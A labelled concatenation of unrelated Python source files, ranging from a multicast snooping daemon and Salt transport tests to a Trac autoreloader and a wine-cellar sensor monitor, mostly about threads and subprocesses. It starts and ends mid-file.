def trans_cb(methods, params):
    """CPS transaction callback: apply a snooping configuration change.

    When the kernel owns snooping state the change is applied through
    mcast_utils (ip-link based when supported, otherwise file based);
    otherwise it is forwarded to the external snooping application handler.
    Returns False on any error (logged with traceback).
    """
    try:
        if kernel_snooping_needed is True:
            ret = _is_ip_link_snoop_cmd_supported()
            if ret:
                return mcast_utils.handle_configs(params)
            else:
                return mcast_utils.handle_configs_fs(params)
        else:
            #Some snooping application is present and it will update
            #snoop status,mrouter port and routes.No update to kernel.
            return mcast_snoop.handle_snoop_updates(params)
    except Exception as ex:
        logging.exception(ex)
        return False
def sigterm_hdlr(signum, frame):
    """SIGTERM handler: request a clean shutdown of the main wait loop."""
    global shutdown
    shutdown = True
def _mcast_set_attr_type():
    """Register source-addr attributes as strings.

    These IP-address attributes arrive as binaries; registering them as
    strings lets cps_utils decode them for display/processing.
    """
    cps_utils.add_attr_type("igmp-mld-snooping/rt/routing/control-plane-protocols/igmp-snooping/vlans/vlan/static-l2-multicast-group/source-addr", "string")
    cps_utils.add_attr_type("igmp-mld-snooping/rt/routing/control-plane-protocols/mld-snooping/vlans/vlan/static-l2-multicast-group/source-addr", "string")
if __name__ == '__main__':
    # Daemon entry point: register CPS handlers and wait for SIGTERM.
    shutdown = False
    # Install signal handlers.
    signal.signal(signal.SIGTERM, sigterm_hdlr)
    # Notify systemd: Daemon is ready
    systemd.daemon.notify("READY=1")
    #if file exists means kernel snooping is not needed and some snooping
    #application might be running
    if mcast_os.path.isfile(snoop_cfg_file) is True:
        ev.logging("BASE_MCAST_SNOOP",ev.DEBUG,"MCAST_SVC","","",0,"Kernel IGMP/MLD snooping not needed")
        kernel_snooping_needed = False
    # Wait for interface service being ready
    interface_key = cps.key_from_name('target', 'dell-base-if-cmn/if/interfaces/interface')
    ev.logging("BASE_MCAST_SNOOP",ev.DEBUG,"MCAST_SVC","","",0,"Wait for interface object to be ready")
    while cps.enabled(interface_key) == False:
        time.sleep(1)
    ev.logging("BASE_MCAST_SNOOP",ev.DEBUG,"MCAST_SVC","","",0,"Interface object ready")
    # Few IP address attributes are in binaries, these ip address are treated as string type.
    _mcast_set_attr_type()
    handle = cps.obj_init()
    d = {}
    d['transaction'] = trans_cb
    #get is supported only for kernel snooping
    if kernel_snooping_needed is True:
        d['get'] = get_cb
        for i in _igmp_keys.keys():
            if i.find('igmp-mld-snooping') == -1:
                continue
            cps.obj_register(handle, _igmp_keys[i], d)
        # Start thread for multicast groups polling
        mcast_utils.polling_thread.start()
    else:
        #Start VLAN monitor thread to disable snooping in kernel.
        monitor = threading.Thread(target=mcast_snoop.monitor_VLAN_interface_event, name="Snoop_VLAN_Monitor")
        # Daemon thread: must not block process exit on shutdown.
        monitor.setDaemon(True)
        monitor.start()
        #if kernel snooping is not used, then only few sets are supported
        # and no gets.
        #TODO: till application code gets commited, relax that part, otherwise it might fail
        d['get'] = mcast_snoop.snoop_get_cb
        for i in _igmp_keys.keys():
            if i.find('igmp-mld-snooping') == -1:
                continue
            cps.obj_register(handle, _igmp_keys[i], d)
    # wait until a signal is received
    while False == shutdown:
        signal.pause()
    systemd.daemon.notify("STOPPING=1")
    # cleanup code here
    # No need to specifically call sys.exit(0).
    # That's the default behavior in Python.
|
threads.py | import time
import threading
import dataclasses
from tests.case import Case
import rich
import rich.progress
class TestThread(threading.Thread):
    """Thread that records, rather than prints, an exception from its target.

    threading.Thread normally reports an exception from run() to stderr and
    discards it; this subclass stores the exception object on ``self.exc``
    so the parent can inspect it and re-raise after join().
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Exception raised by the target callable, or None on success.
        self.exc = None

    def run(self):
        try:
            if self._target:
                self._target(*self._args, **self._kwargs)
        except Exception as caught:
            self.exc = caught
@dataclasses.dataclass
class TestThreadHolder:
    """Pairs a running worker thread with the processor count it reserves."""
    thread: threading.Thread  # the worker; the manager stores TestThread instances
    ppn: int                  # processors-per-node slots the test case occupies
class MFCTestThreadManager:
    """Schedules test cases across a bounded pool of worker threads.

    Capacity is counted in ppn (processors-per-node) units: a case consuming
    ppn=2 occupies two of the nThreads slots until its thread finishes.
    """

    def __init__(self, nThreads: int) -> None:
        self.threads = []              # active TestThreadHolder entries
        self.nThreads = nThreads       # total capacity, in ppn units
        self.nAvailable = self.nThreads

    def join_first_dead_thread(self, progress, complete_tracker) -> None:
        """Reap at most one finished thread, reclaiming its ppn slots.

        Re-raises any exception captured by the worker (see TestThread.exc),
        so a failing test case aborts the whole run.
        """
        for threadID, threadHolder in enumerate(self.threads):
            threadHolder: TestThreadHolder
            if not threadHolder.thread.is_alive():
                # Idiom fix: identity comparison with None (was `!= None`).
                if threadHolder.thread.exc is not None:
                    raise threadHolder.thread.exc
                self.nAvailable += threadHolder.ppn
                progress.advance(complete_tracker)
                # Safe despite iterating: we break immediately after deleting.
                del self.threads[threadID]
                break

    def run(self, cases: list, handle_case) -> None:
        """Run handle_case for every case, at most nThreads ppn concurrently."""
        with rich.progress.Progress() as progress:
            queue_tracker = progress.add_task("Queued   ", total=len(cases))
            complete_tracker = progress.add_task("Completed", total=len(cases))
            # Queue Tests
            for i, test in enumerate(cases):
                test: Case
                ppn = test["ppn"]
                # Wait until there are threads available
                while self.nAvailable < ppn:
                    # This is important if "-j 1" is used (the default) since there
                    # are test cases that require ppn=2
                    if ppn > self.nThreads and self.nAvailable > 0:
                        break
                    # Keep track of threads that are done
                    self.join_first_dead_thread(progress, complete_tracker)
                    # Do not overwhelm this core with this loop
                    time.sleep(0.05)
                # Launch Thread
                progress.advance(queue_tracker)
                thread = TestThread(target=handle_case, args=(test,))
                thread.start()
                self.threads.append(TestThreadHolder(thread, ppn))
                self.nAvailable -= ppn
            # Wait for the last tests to complete
            while len(self.threads) != 0:
                # Keep track of threads that are done
                self.join_first_dead_thread(progress, complete_tracker)
                # Do not overwhelm this core with this loop
                time.sleep(0.05)
|
eval_multiprocess.py | # Copyright 2018 Google. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Use multiprocess to perform COCO metric evaluation.
"""
# copybara:insert import multiprocessing
from REDACTED.mask_rcnn import mask_rcnn_params
from REDACTED.mask_rcnn import segm_utils
# copybara:strip_begin
from REDACTED.REDACTED.multiprocessing import REDACTEDprocess
# copybara:strip_end
# copybara:strip_begin
def REDACTED_post_processing():
"""REDACTED batch-processes the predictions."""
q_in, q_out = REDACTEDprocess.get_user_data()
post_processing(q_in, q_out)
# copybara:strip_end
def post_processing(q_in, q_out):
  """Batch-processes the predictions.

  Worker loop: pulls (boxes, masks, image_info) batches from q_in, converts
  them into per-image detection and segmentation results, and pushes
  (detections, segmentations) tuples to q_out.  A batch whose boxes are
  None terminates the loop, after which a (None, None) sentinel is emitted
  so the parent can count finished workers.
  """
  boxes, masks, image_info = q_in.get()
  while boxes is not None:
    detections = []
    segmentations = []
    for i, box in enumerate(boxes):
      # Slice out the padding data where score is zero; keep at least one row.
      num = max(1, sum(box[:, 5] > 0))
      box = box[:num, :]
      segms = segm_utils.segm_results(
          masks[i], box[:, 1:5], int(image_info[i][3]), int(image_info[i][4]))
      detections.extend(box)
      segmentations.append(segms)
    q_out.put((detections, segmentations))
    boxes, masks, image_info = q_in.get()
  # signal the parent process that we have completed all work.
  q_out.put((None, None))
def update_eval_metric(q_out, eval_metric, exited_process):
  """Consume one worker result from q_out.

  A (None, None) sentinel means a worker finished: the returned exit count
  is incremented.  Any other result is folded into eval_metric and the
  count is returned unchanged.
  """
  detections, segmentations = q_out.get()
  worker_done = detections is None and segmentations is None
  if worker_done:
    return exited_process + 1
  eval_metric.update(detections, segmentations)
  return exited_process
def eval_multiprocessing(predictions,
                         eval_metric,
                         eval_worker_count,
                         queue_size=mask_rcnn_params.QUEUE_SIZE):
  """Enables multiprocessing to update eval metrics.

  Fans prediction batches out to eval_worker_count post-processing workers
  over q_in, drains their results from q_out into eval_metric, then sends
  one (None, None, None) poison pill per worker and joins them.
  """
  # copybara:strip_begin
  q_in, q_out = REDACTEDprocess.get_user_data()
  processes = [
      REDACTEDprocess.Process(target=REDACTED_post_processing)
      for _ in range(eval_worker_count)
  ]
  # copybara:strip_end_and_replace_begin
  # q_in = multiprocessing.Queue(maxsize=queue_size)
  # q_out = multiprocessing.Queue(maxsize=queue_size)
  # processes = [
  #     multiprocessing.Process(target=post_processing, args=(q_in, q_out))
  #     for _ in range(eval_worker_count)
  # ]
  # copybara:replace_end
  for p in processes:
    p.start()
  # TODO(b/129410706): investigate whether threading improves speed.
  # Every predictor.next() gets a batch of prediction (a dictionary).
  exited_process = 0
  # Split the predictions evenly across workers (any remainder is dropped —
  # presumably padded upstream; verify against the caller).
  samples = len(predictions['detections']) // eval_worker_count
  for i in range(eval_worker_count):
    # Drain q_out while the pipes are congested to avoid deadlocking on put.
    while q_in.full() or q_out.qsize() > queue_size // 4:
      exited_process = update_eval_metric(q_out, eval_metric, exited_process)
    q_in.put((predictions['detections'][i * samples:(i + 1) * samples],
              predictions['mask_outputs'][i * samples:(i + 1) * samples],
              predictions['image_info'][i * samples:(i + 1) * samples]))
  # Adds empty items to signal the children to quit.
  for _ in processes:
    q_in.put((None, None, None))
  # Cleans up q_out and waits for all the processes to finish work.
  while not q_out.empty() or exited_process < eval_worker_count:
    exited_process = update_eval_metric(q_out, eval_metric, exited_process)
  for p in processes:
    # actively terminate all processes (to work around the multiprocessing
    # deadlock issue in Cloud)
    # copybara:insert p.terminate()
    p.join()
|
autoreload.py | # -*- coding: utf-8 -*-
#
# Copyright (C)2006-2009 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
import os
import sys
import threading
import time
import traceback
_SLEEP_TIME = 1
def _reloader_thread(modification_callback, loop_callback):
    """When this function is run from the main thread, it will force other
    threads to exit when any modules currently loaded change.

    @param modification_callback: a function taking a single argument, the
        modified file, which is called every time a modification is detected
    @param loop_callback: a function taking no arguments, which is called
        after every modification check
    """
    # Maps filename -> last seen mtime; a change triggers exit code 3,
    # which _restart_with_reloader interprets as "restart".
    mtimes = {}
    while True:
        for filename in filter(None, [getattr(module, '__file__', None)
                                      for module in sys.modules.values()]):
            while not os.path.isfile(filename): # Probably in an egg or zip file
                filename = os.path.dirname(filename)
                if not filename:
                    break
            if not filename: # Couldn't map to physical file, so just ignore
                continue
            # Watch the source, not the compiled artifact.
            if filename.endswith(('.pyc', '.pyo')):
                filename = filename[:-1]
            if not os.path.isfile(filename):
                # Compiled file for non-existent source
                continue
            mtime = os.stat(filename).st_mtime
            if filename not in mtimes:
                mtimes[filename] = mtime
                continue
            if mtime != mtimes[filename]:
                modification_callback(filename)
                sys.exit(3)
        loop_callback()
        time.sleep(_SLEEP_TIME)
def _restart_with_reloader():
    """Re-exec this program in a child process until it stops asking to reload.

    The child signals "a module changed, restart me" with exit code 3
    (see _reloader_thread); any other exit code is returned to the caller.
    """
    while True:
        args = [sys.executable] + sys.argv
        if sys.platform == 'win32':
            # Windows spawn does not quote arguments for us.
            args = ['"%s"' % arg for arg in args]
        new_environ = os.environ.copy()
        # Tells the child's main() to actually run the program.
        new_environ['RUN_MAIN'] = 'true'
        # This call reinvokes ourself and goes into the other branch of main as
        # a new process.
        exit_code = os.spawnve(os.P_WAIT, sys.executable,
                               args, new_environ)
        if exit_code != 3:
            return exit_code
def main(func, modification_callback, *args, **kwargs):
    """Run the given function and restart any time modules are changed.

    NOTE: Python 2 syntax (`except SystemExit, e`) — this module cannot run
    on Python 3 as written.
    """
    if os.environ.get('RUN_MAIN'):
        # Child process: run the real program in a thread and watch files.
        # exit_code is a one-element list so the closure can set it.
        exit_code = []
        def main_thread():
            try:
                func(*args, **kwargs)
                exit_code.append(None)
            except SystemExit, e:
                exit_code.append(e.code)
            except:
                traceback.print_exception(*sys.exc_info())
                exit_code.append(1)
        def check_exit():
            # Propagate the program's exit once the worker thread finished.
            if exit_code:
                sys.exit(exit_code[0])
        # Launch the actual program as a child thread
        thread = threading.Thread(target=main_thread, name='Main thread')
        thread.setDaemon(True)
        thread.start()
        try:
            # Now wait for a file modification and quit
            _reloader_thread(modification_callback, check_exit)
        except KeyboardInterrupt:
            pass
    else:
        # Initial invocation just waits around restarting this executable
        try:
            sys.exit(_restart_with_reloader())
        except KeyboardInterrupt:
            pass
|
neuralet-distancing.py | #!/usr/bin/python3
import argparse
from multiprocessing import Process
import threading
from libs.config_engine import ConfigEngine
import libs.pubsub
import logging
logger = logging.getLogger(__name__)
def start_engine(config, video_path):
    """Child-process entry point: run the CV distancing engine on a video.

    The import is deferred so the heavy CV stack is only loaded in the
    engine process, not in the parent or the web-GUI process.
    """
    from libs.core import Distancing as CvEngine
    engine = CvEngine(config)
    engine.process_video(video_path)
def start_web_gui(config):
    """Child-process entry point: serve the web GUI (deferred import, see start_engine)."""
    from ui.web_gui import WebGUI
    ui = WebGUI(config)
    ui.start()
def main(config):
    """Launch the CV engine and web GUI as separate processes and babysit them.

    Blocks forever on an Event; Ctrl-C terminates and joins both children.

    :param config: a ConfigEngine instance, or a path to a config file.
    """
    logging.basicConfig(level=logging.INFO)
    if isinstance(config, str):
        config = ConfigEngine(config)
    # Must happen before fork so both children inherit the shared state.
    libs.pubsub.init_shared_resources()
    video_path = config.get_section_dict("App")["VideoPath"]
    process_engine = Process(target=start_engine, args=(config, video_path,))
    process_api = Process(target=start_web_gui, args=(config,))
    process_api.start()
    process_engine.start()
    logger.info("Services Started.")
    # Park the main thread; wait() is interruptible by KeyboardInterrupt.
    forever = threading.Event()
    try:
        forever.wait()
    except KeyboardInterrupt:
        logger.info("Received interrupt. Terminating...")
        process_engine.terminate()
        process_engine.join()
        logger.info("CV Engine terminated.")
        process_api.terminate()
        process_api.join()
        logger.info("Web GUI terminated.")
if __name__ == '__main__':
    # CLI entry point: --config points at the application config file.
    parser = argparse.ArgumentParser()
    parser.add_argument('--config', required=True)
    args = parser.parse_args()
    main(args.config)
|
test_tcp.py | # -*- coding: utf-8 -*-
'''
:codeauthor: Thomas Jackson <jacksontj.89@gmail.com>
'''
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import threading
import tornado.gen
import tornado.ioloop
import tornado.concurrent
from tornado.testing import AsyncTestCase, gen_test
import salt.config
from salt.ext import six
import salt.utils.platform
import salt.utils.process
import salt.transport.server
import salt.transport.client
import salt.exceptions
from salt.ext.six.moves import range
from salt.transport.tcp import SaltMessageClientPool
# Import Salt Testing libs
from tests.support.unit import TestCase, skipIf
from tests.support.helpers import get_unused_localhost_port, flaky
from tests.support.mixins import AdaptedConfigurationTestCaseMixin
from tests.support.mock import MagicMock, patch
from tests.unit.transport.mixins import PubChannelMixin, ReqChannelMixin
class BaseTCPReqCase(TestCase, AdaptedConfigurationTestCaseMixin):
    '''
    Test the req server/client pair

    Spins up a real TCP ReqServerChannel on free localhost ports, with its
    IOLoop running in a daemon thread.  Subclasses provide _handle_payload;
    the base class itself is skipped (setUpClass returns early without it).
    '''
    @classmethod
    def setUpClass(cls):
        # The base class defines no _handle_payload: do not start a server.
        if not hasattr(cls, '_handle_payload'):
            return
        ret_port = get_unused_localhost_port()
        publish_port = get_unused_localhost_port()
        tcp_master_pub_port = get_unused_localhost_port()
        tcp_master_pull_port = get_unused_localhost_port()
        tcp_master_publish_pull = get_unused_localhost_port()
        tcp_master_workers = get_unused_localhost_port()
        cls.master_config = cls.get_temp_config(
            'master',
            **{'transport': 'tcp',
               'auto_accept': True,
               'ret_port': ret_port,
               'publish_port': publish_port,
               'tcp_master_pub_port': tcp_master_pub_port,
               'tcp_master_pull_port': tcp_master_pull_port,
               'tcp_master_publish_pull': tcp_master_publish_pull,
               'tcp_master_workers': tcp_master_workers}
        )
        cls.minion_config = cls.get_temp_config(
            'minion',
            **{'transport': 'tcp',
               'master_ip': '127.0.0.1',
               'master_port': ret_port,
               'master_uri': 'tcp://127.0.0.1:{0}'.format(ret_port)}
        )
        cls.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager')
        cls.server_channel = salt.transport.server.ReqServerChannel.factory(cls.master_config)
        cls.server_channel.pre_fork(cls.process_manager)
        cls.io_loop = tornado.ioloop.IOLoop()
        def run_loop_in_thread(loop):
            loop.make_current()
            loop.start()
        cls.server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
        # Daemon thread so a hung loop cannot block interpreter exit.
        cls.server_thread = threading.Thread(target=run_loop_in_thread, args=(cls.io_loop,))
        cls.server_thread.daemon = True
        cls.server_thread.start()
    @classmethod
    def tearDownClass(cls):
        if not hasattr(cls, '_handle_payload'):
            return
        if hasattr(cls, 'io_loop'):
            # Stop the loop from inside its own thread, then join.
            cls.io_loop.add_callback(cls.io_loop.stop)
            cls.server_thread.join()
            cls.process_manager.kill_children()
            cls.server_channel.close()
            del cls.server_channel
    @classmethod
    @tornado.gen.coroutine
    def _handle_payload(cls, payload):
        '''
        TODO: something besides echo
        '''
        raise tornado.gen.Return((payload, {'fun': 'send_clear'}))
@skipIf(salt.utils.platform.is_darwin(), 'hanging test suite on MacOS')
class ClearReqTestCases(BaseTCPReqCase, ReqChannelMixin):
    '''
    Test all of the clear msg stuff

    Uses an unencrypted ('clear') request channel against the echo server
    from BaseTCPReqCase.
    '''
    def setUp(self):
        self.channel = salt.transport.client.ReqChannel.factory(self.minion_config, crypt='clear')
    def tearDown(self):
        del self.channel
    @classmethod
    @tornado.gen.coroutine
    def _handle_payload(cls, payload):
        '''
        TODO: something besides echo
        '''
        raise tornado.gen.Return((payload, {'fun': 'send_clear'}))
@skipIf(salt.utils.platform.is_darwin(), 'hanging test suite on MacOS')
class AESReqTestCases(BaseTCPReqCase, ReqChannelMixin):
    '''Encrypted variant of the request-channel tests (default crypt).'''
    def setUp(self):
        self.channel = salt.transport.client.ReqChannel.factory(self.minion_config)
    def tearDown(self):
        del self.channel
    @classmethod
    @tornado.gen.coroutine
    def _handle_payload(cls, payload):
        '''
        TODO: something besides echo
        '''
        raise tornado.gen.Return((payload, {'fun': 'send'}))
    # TODO: make failed returns have a specific framing so we can raise the same exception
    # on encrypted channels
    @flaky
    def test_badload(self):
        '''
        Test a variety of bad requests, make sure that we get some sort of error
        '''
        msgs = ['', [], tuple()]
        for msg in msgs:
            with self.assertRaises(salt.exceptions.AuthenticationError):
                ret = self.channel.send(msg)
class BaseTCPPubCase(AsyncTestCase, AdaptedConfigurationTestCaseMixin):
    '''
    Test the req server/client pair

    Publish-channel variant: starts both a PubServerChannel and a
    ReqServerChannel (the latter is required for minion auth), with the
    request server's IOLoop running in a daemon thread.
    '''
    @classmethod
    def setUpClass(cls):
        ret_port = get_unused_localhost_port()
        publish_port = get_unused_localhost_port()
        tcp_master_pub_port = get_unused_localhost_port()
        tcp_master_pull_port = get_unused_localhost_port()
        tcp_master_publish_pull = get_unused_localhost_port()
        tcp_master_workers = get_unused_localhost_port()
        cls.master_config = cls.get_temp_config(
            'master',
            **{'transport': 'tcp',
               'auto_accept': True,
               'ret_port': ret_port,
               'publish_port': publish_port,
               'tcp_master_pub_port': tcp_master_pub_port,
               'tcp_master_pull_port': tcp_master_pull_port,
               'tcp_master_publish_pull': tcp_master_publish_pull,
               'tcp_master_workers': tcp_master_workers}
        )
        cls.minion_config = cls.get_temp_config(
            'minion',
            **{'transport': 'tcp',
               'master_ip': '127.0.0.1',
               'auth_timeout': 1,
               'master_port': ret_port,
               'master_uri': 'tcp://127.0.0.1:{0}'.format(ret_port)}
        )
        cls.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager')
        cls.server_channel = salt.transport.server.PubServerChannel.factory(cls.master_config)
        cls.server_channel.pre_fork(cls.process_manager)
        # we also require req server for auth
        cls.req_server_channel = salt.transport.server.ReqServerChannel.factory(cls.master_config)
        cls.req_server_channel.pre_fork(cls.process_manager)
        cls._server_io_loop = tornado.ioloop.IOLoop()
        cls.req_server_channel.post_fork(cls._handle_payload, io_loop=cls._server_io_loop)
        def run_loop_in_thread(loop):
            loop.make_current()
            loop.start()
        cls.server_thread = threading.Thread(target=run_loop_in_thread, args=(cls._server_io_loop,))
        cls.server_thread.daemon = True
        cls.server_thread.start()
    @classmethod
    def _handle_payload(cls, payload):
        '''
        TODO: something besides echo
        '''
        return payload, {'fun': 'send_clear'}
    @classmethod
    def tearDownClass(cls):
        cls._server_io_loop.add_callback(cls._server_io_loop.stop)
        cls.server_thread.join()
        cls.process_manager.kill_children()
        cls.req_server_channel.close()
        del cls.req_server_channel
    def setUp(self):
        super(BaseTCPPubCase, self).setUp()
        # Snapshot the IOLoop handlers so tearDown can detect leaked FDs.
        self._start_handlers = dict(self.io_loop._handlers)
    def tearDown(self):
        super(BaseTCPPubCase, self).tearDown()
        failures = []
        for k, v in six.iteritems(self.io_loop._handlers):
            if self._start_handlers.get(k) != v:
                failures.append((k, v))
        if len(failures) > 0:
            raise Exception('FDs still attached to the IOLoop: {0}'.format(failures))
        # NOTE(review): self.channel is created by subclasses/mixins, not this
        # base class — confirm every subclass sets it before relying on this.
        del self.channel
        del self._start_handlers
@skipIf(True, 'Skip until we can devote time to fix this test')
class AsyncPubChannelTest(BaseTCPPubCase, PubChannelMixin):
    '''
    Tests around the publish system
    '''
class SaltMessageClientPoolTest(AsyncTestCase):
    '''Unit tests for SaltMessageClientPool using mocked member clients.'''
    def setUp(self):
        super(SaltMessageClientPoolTest, self).setUp()
        sock_pool_size = 5
        # Patch __init__ so no real sockets are created, then replace the
        # pool's clients with MagicMocks we can program per test.
        with patch('salt.transport.tcp.SaltMessageClient.__init__', MagicMock(return_value=None)):
            self.message_client_pool = SaltMessageClientPool({'sock_pool_size': sock_pool_size},
                                                             args=({}, '', 0))
        self.original_message_clients = self.message_client_pool.message_clients
        self.message_client_pool.message_clients = [MagicMock() for _ in range(sock_pool_size)]
    def tearDown(self):
        with patch('salt.transport.tcp.SaltMessageClient.close', MagicMock(return_value=None)):
            del self.original_message_clients
        super(SaltMessageClientPoolTest, self).tearDown()
    def test_send(self):
        # The pool should route send() to the client with the shortest queue.
        for message_client_mock in self.message_client_pool.message_clients:
            message_client_mock.send_queue = [0, 0, 0]
            message_client_mock.send.return_value = []
        self.assertEqual([], self.message_client_pool.send())
        self.message_client_pool.message_clients[2].send_queue = [0]
        self.message_client_pool.message_clients[2].send.return_value = [1]
        self.assertEqual([1], self.message_client_pool.send())
    def test_write_to_stream(self):
        # Same shortest-queue routing for raw stream writes.
        for message_client_mock in self.message_client_pool.message_clients:
            message_client_mock.send_queue = [0, 0, 0]
            message_client_mock._stream.write.return_value = []
        self.assertEqual([], self.message_client_pool.write_to_stream(''))
        self.message_client_pool.message_clients[2].send_queue = [0]
        self.message_client_pool.message_clients[2]._stream.write.return_value = [1]
        self.assertEqual([1], self.message_client_pool.write_to_stream(''))
    def test_close(self):
        self.message_client_pool.close()
        self.assertEqual([], self.message_client_pool.message_clients)
    def test_on_recv(self):
        # on_recv must be fanned out to every pooled client.
        for message_client_mock in self.message_client_pool.message_clients:
            message_client_mock.on_recv.return_value = None
        self.message_client_pool.on_recv()
        for message_client_mock in self.message_client_pool.message_clients:
            self.assertTrue(message_client_mock.on_recv.called)
    def test_connect_all(self):
        @gen_test
        def test_connect(self):
            yield self.message_client_pool.connect()
        # All clients resolve their connect future -> pool connect resolves.
        for message_client_mock in self.message_client_pool.message_clients:
            future = tornado.concurrent.Future()
            future.set_result('foo')
            message_client_mock.connect.return_value = future
        self.assertIsNone(test_connect(self))
    def test_connect_partial(self):
        @gen_test(timeout=0.1)
        def test_connect(self):
            yield self.message_client_pool.connect()
        # Only every other client resolves -> pool connect must time out.
        for idx, message_client_mock in enumerate(self.message_client_pool.message_clients):
            future = tornado.concurrent.Future()
            if idx % 2 == 0:
                future.set_result('foo')
            message_client_mock.connect.return_value = future
        with self.assertRaises(tornado.ioloop.TimeoutError):
            test_connect(self)
|
winecave.py | #coding: utf-8
import common as com
import datetime as dt
import json
import hashlib
import mail
import os
import requests
import sensor as s
import threading
import time
import uptime
# Unix timestamps of the last alert/report mail, used for rate limiting.
last_alerted = 0
last_reported = 0
# Directory where readings are spooled as JSON files for later upload.
QUEUE = '/opt/winecave/queue/'
def enqueue(obj):
    """Serialise *obj* to JSON and drop it into the upload queue directory.

    The filename is the MD5 of the object's repr, so identical payloads
    overwrite rather than accumulate.  Failures are logged and swallowed
    (best-effort persistence).
    """
    try:
        with open('{0}{1}'.format(QUEUE, hashlib.md5(str(obj).encode()).hexdigest()), 'w') as f:
            f.write(json.dumps(obj))
    except Exception as e:
        # Bug fix: 'traceback' was referenced here but never imported at
        # module level, so the error path itself raised NameError.
        import traceback
        com.error(traceback.format_exc())
        com.error(str(e))
def regist_data(type, value):
    """Spool a sensor reading of the given type for later upload.

    :param type: reading type code ('T', 'P' or 'H' as used by process()).
    :param value: numeric reading; rounded to 2 decimals.
    """
    # NOTE(review): api_url/headers are only used by the commented-out direct
    # POST below; kept so that path can be re-enabled easily.
    api_url = 'http://edisoner.com/api/regist2.php'
    headers = {'content-type': 'application/json'}
    payload = {'type': type, 'value': round(value, 2), 'timestamp': dt.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}
    enqueue(payload)
    # response = requests.post(api_url, data=json.dumps(payload), headers=headers)
    # com.info('response: {0}'.format(response.text))
def alert():
    """Send an I2C-error alert mail, rate-limited to once per hour."""
    global last_alerted
    # Fire the error alert at most once per hour.
    if time.time() - last_alerted > 3600:
        subject = 'sensor error [{0}]'.format(dt.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
        body_text = 'I2C Error occured.'
        mail.sendmail('koichi.inokuchi@gmail.com', subject, body_text)
        last_alerted = time.time()
        com.warn('alert mail fired !')
def report(t, h):
    """Mail a status report (uptime, disk usage, readings), about hourly.

    :param t: temperature in degrees Celsius.
    :param h: relative humidity in percent.
    """
    global last_reported
    # Report at most once per hour (3595 s: slightly under an hour so the
    # 60 s measurement cycle cannot skip a slot).
    if time.time() - last_reported > 3595:
        stat = os.statvfs('/')
        free = int(stat.f_bavail * stat.f_frsize // 1024 // 1024)
        total = int(stat.f_blocks * stat.f_frsize // 1024 // 1024)
        used = int((stat.f_blocks - stat.f_bfree) * stat.f_frsize // 1024 //1024)
        subject = '[{0}] sensor status report'.format(dt.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
        body_text = []
        body_text.append('sensor status at {0}'.format(dt.datetime.now().strftime('%Y-%m-%d %H:%M:%S')))
        body_text.append(' system uptime: {0:d} days {1:d} hour {2:d} min'.format(
            int(uptime.uptime()//86400),
            int(uptime.uptime()%86400//3600),
            int(uptime.uptime()%3600//60)))
        body_text.append(' file system total: {0:,d} MB'.format(total))
        body_text.append(' file system used : {0:,d} MB ({1:.1f}%)'.format(used, used * 100 / total))
        body_text.append(' file system avail: {0:,d} MB ({1:.1f}%)'.format(free, free * 100 / total))
        body_text.append(' temperature : {0:.2f} C'.format(t))
        body_text.append(' humidity : {0:.2f} %'.format(h))
        mail.sendmail('koichi.inokuchi@gmail.com', subject, '\n'.join(body_text))
        last_reported = time.time()
        com.info('report mail fired !')
    else:
        com.info('report mail skiped !')
def process():
    """One measurement cycle: read T/P/H, queue valid readings, alert or report.

    Each sensor read is checked against the sensor module's ERROR sentinel;
    any failure triggers alert(), otherwise a (rate-limited) report is sent.
    """
    t = s.get_temperature()
    error = False
    if t != s.ERROR:
        regist_data('T', t)
        com.info('{0:.2f} C'.format(t))
    else:
        com.error('I2C error')
        error = True
    p = s.get_pressure()
    if p != s.ERROR:
        regist_data('P', p)
        com.info('{0:.2f} hPa'.format(p))
    else:
        com.error('I2C error')
        error = True
    h = s.get_humidity()
    if h != s.ERROR:
        regist_data('H', h)
        com.info('{0:.2f} %'.format(h))
    else:
        com.error('I2C error')
        error = True
    if error:
        alert()
    else:
        # Only reached when t and h are both valid readings.
        report(t, h)
    com.info('-' * 60)
# ------------------------------------------------------------------------------
# program main
# NOTE(review): this log line runs on import as well as on direct execution;
# confirm that is intentional before moving it under the guard below.
com.info('----- Wine cave monitor started.')
if __name__ == '__main__':
    com.info('Wine cave monitor started.')
    # Offset subtracted from the sleep to compensate for loop overhead.
    AJUST = 0.060
    while True:
        t0 = time.time()
        # Run each measurement cycle in its own thread so a slow or hung
        # I2C read cannot delay the next cycle's schedule.
        th = threading.Thread(target=process)
        th.start()
        t1 = time.time()
        delay = 60 - (t1 - t0) - AJUST
        # Bug fix: clamp to zero — time.sleep() raises ValueError for a
        # negative argument, which would crash the monitor if starting the
        # cycle ever took longer than 60 seconds.
        if delay < 0:
            delay = 0
        com.info('sleep for {0:.6f} seconds'.format(delay))
        time.sleep(delay)
|
test_websocket_provider.py | import asyncio
import pytest
import sys
from threading import (
Thread,
)
import websockets
from tests.utils import (
wait_for_ws,
)
from platon import Web3
from platon.exceptions import (
ValidationError,
)
from platon.providers.websocket import (
WebsocketProvider,
)
if sys.version_info >= (3, 8):
from asyncio.exceptions import (
TimeoutError,
)
else:
from concurrent.futures import (
TimeoutError,
)
@pytest.fixture
def start_websocket_server(open_port):
    """Run a loopback echo websocket server in a background thread.

    The server reads one message, waits 20 ms (long enough to trip the
    0.01 s client timeout used by the w3 fixture), then echoes it back.

